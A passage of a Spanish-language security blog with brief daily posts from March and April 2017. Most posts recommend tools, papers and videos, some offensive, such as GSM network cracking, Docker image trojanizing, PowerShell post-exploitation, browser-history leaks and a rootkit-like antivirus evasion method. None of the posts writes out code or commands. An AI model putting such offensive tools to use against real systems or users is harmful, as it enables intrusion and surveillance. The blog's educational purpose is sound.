Es un método que no he visto antes y además, podemos modificar la [user land] y el comportamiento del [kernel land] sin ser detectados por un antivirus o nuevas técnicas de defensa. Vamos, que está muy bien pensado.

Muchas mas información de como es capaz de modificar estos espacion, lo encontrareis en el enlace a la herramienta: 

Sed Buenos ;) 

lunes, 3 de abril de 2017

USB Canary.- SMSeame cuando se conecte un USB

Esta herramienta ha llamado poderosamente mi atención hoy.  Ya sabéis que ando un poco metido con el el tema de udev y todo lo que sea controlar si se pincha o no una dispositivo USB ahora me apasiona. Así que si me pones una herramienta que es capaz de enviar un SMS cada vez que alguien pincha un USB en tu dispositivo vuelvo loco. 


USB Canary es una herramienta para Linux que usa pyudev (la librería para controlar udev en Python) para monitorizar un dispositivos USB. Ademas, Se puede configurar para enviarle un SMS a través de la API Twilio (una plataforma de comunicaciones cloud), o notificar a un canal Slack. 

Como podéis deducir al leer que utiliza barias APIs y librerias,  USB Canary tiene bastantes dependencia y si, nos tocará configurar el acceso de las APIs. Es algo complicado pero después tiene su recompensa ya que esta herramienta de quedará latente en el equipo como si fuera un "servicio" mas. 

Hasta tiene un uso similar: 
  • ./usb_canary.py start | stop | restart
Enlace a la herramienta, mucha mas información y mini tutorial de como instalarla: 

domingo, 2 de abril de 2017

HackThis Intermediate 3.- Cookies para todos

El mundo de las cookies es divertido,  pero muchas veces no nos damos cuenta pero estamos siendo mediante cookies, es ta es una practica poco aconsejable para controlar el trafico de a nuestra página web. Kazukun nos muestra en este vídeo como manipular una cookie para que nos permita acceder al contenido bloqueado por la web.


Sed Buenos ;)

viernes, 31 de marzo de 2017

Vídeo.- Hackeame si puedes

Nunca os habéis pensado ¿Qué pasa cuando una herramienta que un hacker a liberado a la comunidad es usada por los malos? ¿Qué consecuencias tendrá para el Hacker? Pues hoy os recomiendo el documental "Hackeame si puedes" podremos ver al creador de DarkComet hablando y respondiendo esta clase de preguntas. La verdad es que es muy interesante

 

Sed Buenos ;)

jueves, 30 de marzo de 2017

Ruido en tu historial de navegación.

Hoy toca una entrada un poco "Hacktivista" pero que a la vez nos toca a todos los usuarios de la red de redes por igual. Se trata de [la resolución 34] aprobada el 29 de Marzo del 2017 en Estados Unidos donde se le da la potestad a los ISP (Los proveedores de servicios de Internet) vender legalmente tu actividad en el red. 


Para esto y para tocar un poco los "nacasones" [Dan Schultz] ha creado Internet Noice, una página especialmente creada para acceder a páginas aleatorias para llenar de "ruido" nuestro historial y a la vez fastidiar un poco la base de datos de nuestro ISP. 

Aquí tenéis el enlace: 

Sed Buenos ;) 

miércoles, 29 de marzo de 2017

Slides.- Automatizando la Post-explotación con PowerShell

Ya tendríamos que estar usando PowerShell ya que nuestra querida consola de Windows la "CMD" [le queda poco] para pasar a mejor vida y mas vale que nos vayamos acostumbrando. Además no nos va nada mal ya que nos puede ayudar un montón en la fase de Post-Explotación. 

James Tarala de EnclaveSecurity nos explica desde un enfoque practico el arte de trastear en PowerShell después de tener acceso a una máquina.

Aquí tenéis sus slides y merecen la pena al menos, aunque sea, para que os den ganas de empezar a jugar con PowerShell:


Sed Buenos ;) 

martes, 28 de marzo de 2017

DNS Queue.- ¿Ya consultas tu DNS en paralelo?

La verdad es que no es el mejor titulo posible para esta entrada y confieso que no tengo un día muy creativo pero ha quedado bien.  Hoy quiero que juguéis con el script DNS Queue no deja de ser otro punto de vista para extraer todos los dominios de una pagina web a través de jugar con el DNS pero tiene una manera curiosa de hacerlo. 


"DNS Queue Se crea una cola de subprocesos y tareas para sondear de cada uno de los subdominios del dominio raíz. En cada iteración cada hilo muerto se elimina y la cola se actualiza según sea necesario."

Ademas tiene un uso muy sencillo: 
Enlace a la herramienta y vídeo de muestra: 
Sed Buenos ;) 

lunes, 27 de marzo de 2017

Paper.- iOS 10 Security (Marzo 2017)

Si alguna vez habéis sentido curiosidad por ver como funciona la seguridad en iOS, como yo, os interesará saber que Apple ha "liberado" un paper dedicado a explicar a vista de águila como funciona la seguridad de iOS 10 así como detallar las APIs que utiliza para ciertos servicios. 


Un paper muy interesante si tenéis curiosidad por saber (a alto nivel claro) como funciona el cifrado por hardware, que pares van cifradas cuales no, etc. Vamos,  si te interesa saber como funciona la seguridad de un dispositivo Apple con iOS 10.

Sed Buenos ;) 

domingo, 26 de marzo de 2017

HackThis Intermediate 2.- POST Everywhere

Domingo, día de nuevo vídeo en el canal del blog y si en el último reto conseguíamos colar una petición GET con el usuario y la contraseña, hoy toca jugar con los POST en este caso Kazukun nos enseña como enviar esta petición con un simple HTML.

Esperamos que os guste: 


Sed Buenos ;)


viernes, 24 de marzo de 2017

Vídeo.- Operaciones Militares en el Ciberespacio

Se ayer me acordaba de la ponencia del ministerio de defensa hoy os quiero recomendar la ponencia que dio Manuel Saz Baselga: Teniente Coronel del Ejército de Tierra destinado en el Mando Conjunto de Ciberdefensa en la CiberCamp 2016, sobre las operaciones militares en el ciberespacio. Pero con lo que quiero que os quedéis con la definición de ciberguerra y el porque no deberíamos enmarcarla de esta manera. 


Sed Buenos ;)

jueves, 23 de marzo de 2017

Portspoof.- El arte de la "emulación" de puertos

Hace ya un tiempo, viendo [una ponencia] del Ministerio de Defensa, donde se hablaba de seguridad en Internet,  me quedé enamorado de la idea de rotar los puertos de las máquinas varias veces al día. Así que al toparme con la herramienta PortSpoof no he podido evitar recordar la ponencia y lo molón que me parecía tratar de engañar a cualquier escaner de red.

PortSpoof nos ayuda a camuflar los puertos de una máquina mediante varias técnicas: 
  • Hacer creer al escaner que todos los puertos TCP están abiertos mandándoles un SYN+ACK oir cada intento de conexión. 
  • Cada puerto TCP emula servicios valido, cuando la herramienta intente averiguar que software corre detrás de un puerto Portspoof le devolverá información falsa. 

Muy recomendable aunque un poco difícil de instalar si no estas acostumbrados a trabajar con g++ e IPtables.

Muchas mas información, vídeos de ejemplo para que veáis como funciona la herramienta y a la vez la fuente de la noticia: 

miércoles, 22 de marzo de 2017

Paper.- Atacando a RDP

Hoy no sabia que comentaros ya que ayer estuve preparado otras cosas interesantes que tienen que ver con el día 14, 15 y 16 de abril, que ya lo comentaremos mas adelante. Pero hoy las redes sociales han sido buenas y me he topado con el siguiente Paper donde se detalla a un nivel casi matemático un ataque al Remote Descktop Protocol.


Simplemente para que no conozcáis que es el Remote Descktop Protocol: 
"es un protocolo propietario desarrollado por Microsoft que permite la comunicación en la ejecución de una aplicación entre un terminal (mostrando la información procesada que recibe del servidor) y un servidor Windows (recibiendo la información dada por el usuario en el terminal mediante el ratón ó el teclado)."
Mas información acerca del RDP:


Si os habéis fijado en el link a la wiki se describe que se usa un: "Cifrado de 128 bits utilizando el algoritmo criptográfico RC4". Pues por aquí van los tiros RC4 es vulnerable en Windows [si no se ha parcheado] debidamente.

Así que, os dejo con el paper para que le echéis un ojo.

Sed Buenos con esto 0;) 

martes, 21 de marzo de 2017

Topguw.- Cracking de redes GSM

GSM es un estándar que nos ha acompañado durante muchos años y que, a día de hoy se sigue actualizando.  Un estándar que le permite a un usuario conectarse a diferentes servicios desde su movil, pero  esta tecnológica es infinitamente conocida por los SMS. 

Esta tecnología siempre me ha despertado mucha curiosidad así que hoy quiero presentaros la herramienta TopGuw que nos ayudará ha hacer sangre de este tipo de redes en caso de que lo necesitemos.  Eso si,  necesita un poco de conocimiento sobre GSM y una rainbow de 2TB (y paciencia). 


Aquí tenéis muchas mas información sobre el cracking de redes GSM:
Y aquí tenéis la herramienta y a la vez la fuente de esta entrada:, ojo que requiere de algunas dependencias raras. No vayamos a romper nuestra Kali: 
Sed Buenos ;) 

lunes, 20 de marzo de 2017

BadSSL.- Comprueba tu conexión con un clic

En el último año las siglas SSL han resonado muy fuerte tanto que ya siento un sudor frío siempre que veo alguna noticia relacionada con este protocolo. También sabéis que soy una persona un poco paranoica y me gusta hacer algunos checkings antes de realizar ciertas conexiones. 

Así que hoy ha sido una agradable sorpresa encontrarme con BadSSL del Proyecto Chromium aplicación web la cual nos permite verificar la seguridad de nuestro cliente web con solo hacer un clic.  Si, podríamos hacer estas comprobaciones a mano pero también verifica si tu cliente esta siendo victima de algún truco malicioso por parte del fabricante. 


Muy recomendable, echadle un ojo: 
Sed Buenos ;) 

domingo, 19 de marzo de 2017

HackThis Intermediate 1.- Consigue lo que quieres.

Domingo y día de vídeo nuevo en nuestro canal de Youtube, Debido a un fallo con los servicios del HackThis Basic 7 no hemos podido gravar el vídeo por lo que hemos pasadoal nivel Intermediate  y con ello los retos son mas difíciles. En este caso Kazukun nos muestra como pasarle una petición GET a la web para que esta modifique el valor del parámetro Password.

Os dejo con el vídeo:



Sed Buenos ;)

viernes, 17 de marzo de 2017

Vídeo.- Hijacking de Drones mediante GNU radio.

Hoy es viernes, toca prepararse una palomitas y ver algo curioso. Pues y aunque los drones molen mucho ya hemos hablado muchas veces de lo inseguros que son si no se fabrican con una visión orientada a la seguridad. Hasta hemos hecho un pack explicando las 3 maneras de hacer maldades con esta tecnología. 
Pero la parte mas curiosa es que también se puede suplantar/secuestrar los controles de un drone a través de GNU Radio. Interesante.


Sed Buenos ;)

jueves, 16 de marzo de 2017

###ERRATAS###.- Corregidme por favor

La semana pasada llegamos a los 800 seguidores en twitter y cada vez veo que este blog aparece en mas sitios. y temo que la gente no entienda la función principal de este que no es otra que aprender. Mas concretamente en que aprenda yo.  Así que por eso veis un montón de papers, vídeos y ese tipo de información varia que he hace curiosidad quiero compartir.


También quiero que me conozcáis un poco mas a mi y para los que lleváis 2 o 3 años leyendo el blog no os vendrá de nuevo pero nunca he ido de listo o de que lo sepa todo. Es mas cada vez que profundizo mas en este mundo me doy cuenta de lo mucho que me he de poner las pilas.

Por eso he abierto la página ###ERRATAS### donde de momento no hay nada pero la idea es hacer un ranking de las correcciones que me hacéis llegar, que haya una fe de Erratas para que se las entradas que ya están escritas y dar las gracias a quien ha hecho el esfuerzo por hacerme entender el porque un comentario mio es incorrecto.  Claro, quiero entenderlo y aprender que para eso está este blog.

Espero vuestras correcciones y esta no será la última vez que os escriba para comentaros mi vida ya que os voy a tener que explicar por qué el 14,15 y 16 de Abril no va a haber entrada.

Sed Buenos ;)  

miércoles, 15 de marzo de 2017

DockerScan.- A Docker analysis & hacking tools

Desde que se anunció la RootedCON 2017 tengo ganas de ver los vídeos, así que estoy a la que salto con cualquier novedad que sale de este congreso. Hoy me he encontrado con las Slides de la charla Docker might not be your friend. Trojanizing Docker images de [Daniel Garcia (cr0hn)] la cual podéis ver en el siguiente enlace y la cual os recomiendo leer/ver antes de pasar al siguiente punto. 
Docker ha venido para quedarse y para ser trasteada por los expertos de seguridad, Daniel ha sabido como hacerlo y ha liberado la herramienta DorckerScan. Una tool que nos permite analizar, trastea e incluso extraer información de imágenes Dorcker tal como se nos muestra en su vídeo: 


La verdad es que tengo muchísimas ganas de ver la ponencia entera ya que con estas Slides y la herramienta ha despertado mi curiosidad respecto a Docker. Si, ya os dejo el enlace a la herramienta: 

martes, 14 de marzo de 2017

Sniffly2.- Un paso mas para CVE-2016-1617

CVE-2016-1617 (Sniffly) fue una vulnerabilidad muy divertida del año pasado ya que utilizaba el HTTP Strict Transport Security y la Content Security Policy para filtrar todo el historial de un usuario de Firefox o Chrome. Esta vulnerabilidad ya estaba solucionada pero, [diracdeltas] he ha dado una vuelta de tuerca mas y ha presentado Sniffly2.


Sniffly2 es una variante de Sniffly que abusa de los encabezados HTTP Strict Transport Security y esta vez, del Performance Timing API para ver el historial de navegación de los navegadores basados en Chromium. Aunque ya no afecta a Firefox y versiones móviles de Chrome aunque podéis probar la vulnerabilidad desde el siguiente enlace: 
Muchas mas información acerca la vulnerabilidad: 
Sed Buenos con esto 0;) 

lunes, 13 de marzo de 2017

[Paper].- Desbloquea tu Smartphone con Thermal Attacks

¿Os acordáis del Smudge Attacks? A lo mejor por ese nombre no os suena pero si os digo que es el noble arte de adivinar patrones y PINes de Smartphones mediante el visionado de la patina de grasa que han soltado tus manos en el cristal de tu dispositivo y como no, esto está [explicado al detalle] en un paper, 


Pero hoy quiero hablaros de su sucesor el Thermal Attack que si antes era la grasa la que filtraba tu pass en este caso es el calor. 


No os voy a comentar nada mas ya que este paper es muy recomendable y entretenido:
Sed Buenos ;) 

domingo, 12 de marzo de 2017

HackThis Basic 6.- Lo sabemos todo sobre ti

Domingo, eso quiere decir que es día de vídeo nuevo en nuestro canal, aunque el reto de hoy es un poco diferente. 

Si antes teníamos que dar con un usuario y un password oculto en la página o en una foto, hoy tenemos que averiguar ciertas ciertas cosas sobre la página a la que queremos atacar.  Así que Kazukun nos muestra como hacerlo y si le damos la información correcta nos dejará pasar al reto siguiente.


Sed Buenos ;)

viernes, 10 de marzo de 2017

[Vídeo].- Ataques a impresoras.

Es viernes por la noche y supongo todos estamos un poco cansados, así que hoy toca vídeo pero, no hemos de dejar de lado el mundo de la seguridad informática.  Hoy y ya que ne los últimos meses el ataque a las impresoras ha estado de moda, os recomiendo la entrevista a Melchor Sanz, director de tecnología y preventa de HP España que han hecho la buena gente de [Globbsecurity] donde se habla de los 5 vectores de ataque mas usados sobre estos equipos.


Fuente: 
Sed Buenos ;)

jueves, 9 de marzo de 2017

Infografía.- 10 conceptos básicos sobre seguridad informática.

Jueves, día de infografía y hoy toca hablar de que, en este mundo IT, hay algunos términos con los que creo que ya todos deberíamos estar acostumbrados a ello. En esta infografía de INCIBE podemos ver 10 términos básicos y bien explicados. 

https://4.bp.blogspot.com/-VIWjfvTvi6A/VwEVKO2JyQI/AAAAAAAANDQ/cHH3_5i3V_AmRylA5muVqvbaVDDLT-nsw/s00/*


Sed Buenos ;) 

miércoles, 8 de marzo de 2017

Eat more hashes.- El juego de la colisión SHA1

Ayer, por mis redes sociales, mucho revuelo con una entrada del blog [BugRoast] un reto donde el escritor Kinine nos invitaba a descubrir el porque dos binarios con el mismo hash, en MD5 y en SHA1, colisionaban.


Me tire un rato largo pensando y por si queréis hacer el experimento antes de que desvele el porqué, podéis dirigiros a la fuente descargaros los binarios, ejecutarlos (en uno debería imprimirse un Evil y en el otro un Liev) y verificarlos con un md5sum, sha1sum o cualquier herramienta que nos permita verificar el hash del binario.

Enlace a la fuente: 
Dicho esto después de estrujarme mucho la cabeza me dio por buscar e twitter y encontré lo siguiente: 
Es un pequeño truco en Python y la verdad es que divertido ya que de esta manera podríamos generar hasta binarios que colisionaran usando SHA256.  Claro, seria el mismo archivo solo que actuaria de maneras diferentes, mostrando dos resultados diferentes por lo que es normal que tengan el mismo numero de hash. Como he dicho, es un pequeño truco que, la verdad me ha dado un rato muy agradable y me ha servido mas para entender, o eso creo yo, este mundo que tanto me gusta. 

Sed Buenos ;)